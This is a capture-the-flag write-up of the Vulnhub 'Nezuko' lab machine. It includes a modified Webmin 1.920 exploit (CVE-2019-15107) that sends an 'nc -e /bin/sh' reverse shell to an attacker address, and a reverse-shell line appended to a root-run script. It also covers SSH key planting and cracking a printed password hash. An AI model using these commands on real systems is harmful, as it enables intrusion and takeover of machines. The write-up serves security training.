Vulnhub - Nezuko writeup
Nezuko
Author: nezuko kamado
Nmap
Let’s start our enumeration with the HTTP services.
HTTP (port 80)
If we visit the website we can see a simple message with a gif.
I ran gobuster
on the website and found few extra pages.
In the robots.txt
there was a base32 encoded string.
I decoded it and got a message
hint from nezuko : this is not the right port to enumerate ^w^
But I still continued to look in the other dirs I found.
I visited to /sample/
dir which had a file name nothing_here.txt
And there was literally nothing there 😄😄
Since I didn’t found anything on this port. I decided to checkout port 13337
HTTP (port 13337)
I tried visiting this port via browser but request kept getting timedout. For some reason I was not able to open this port. But we know that there is a Webmin
server running with version 1.920
so I decided to look for some kind of exploit.
With a simple google search I found Webmin 1.920 - Remote Code Execution.
I ran the script and got Vulnerable
🎉🎉
Now if we look at the code properly it’s running echo
command and then telling us whether it’s vulnerable or not.
-d 'user=wheel&pam=&expired=2&old=id|echo '$FLAG'&new1=wheel&new2=wheel'
If we can replace this echo command with reverse shell
code that will give us a shell.
After making changes our code would look like
#!/bin/sh
URI=$1;
echo -n "Testing for RCE (CVE-2019-15107) on $URI: ";
curl -X POST -ks $URI'/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=id|nc -e /bin/sh 192.168.56.1 1337 &new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: '$URI'/session_login.cgi'
if [ $? -eq 0 ];
then
echo '\033[0;31mVULNERABLE!\033[0m'
else
echo '\033[0;32mOK! (target is not vulnerable) \033[0m'
fi
#EOF
I ran this script while my listener was listening and I got a shell.
I got the nezuko.txt
in the /home/nezuko/
1af0941e0c4bd4564932184d47dd8bef
Horizontal Privilege Escalation
First of all this is a very shitty Shell that we have right now. I tried to spwan tty shell but for some reason couldn’t.
I noticed that in the /home/nezuko
there is a .ssh
folder but the id_rsa
was empty. We can just place our own SSH Key
(id_rsa.pub
) in authorized_keys
and then login.
Once I did that I was able to login via SSH.
Now we have a good shell for further enumeration. I downloaded and ran enumeration
script.
I found list of user but there was something weird with one user.
We can see the password hash for zenitsu
.
$6$LbPWwHSD$69t89j0Podkdd8dk17jNKt6Dl2.QYwSJGIX0cE5nysr6MX23DFvIAwmxEHOjhBj8rBplVa3rqcVDO0001PY9G0
I saved the hash to a file and used john to crack the password. I got the result within minutes.
Now we can change our user from nezuko
to zenitsu
Vertical privilege escalation
In the /home/zenitsu
I found zenitsu.txt
3f2ada6791f96b6a50a9ee43ee6b62df
In that directory I found another dir name to_nezuko
which had a shell script named send_message_to_nezuko.sh
.
If we look at the /home/nezuko/from_zenitsu/
we’ll find lot of message but all of them had root
permissions meaning this script is running with root privileges.
If we look at the perms of the shell file we can see that user zenitsu
has the write to edit this file.
This mean we can just put a reverse shell code in that file and wait for this script to run.
I ran echo "nc -e /bin/sh 192.168.56.1 4444" >> send_message_to_nezuko.sh
Now run your listener with nc -nlvp 4444
and wait for the root shell to pop up.
After a minute or so I got the reverse shell.
And then I got the root flag.
This is pretty good machine. The thing I liked about this VM was Nothing is hard and nothing is easy in this.
Thanks to @yunaranyancat for making such a good VM.
Thanks for reading, Feedback is always appreciated.
Follow me @0xmzfr for more “Writeups”.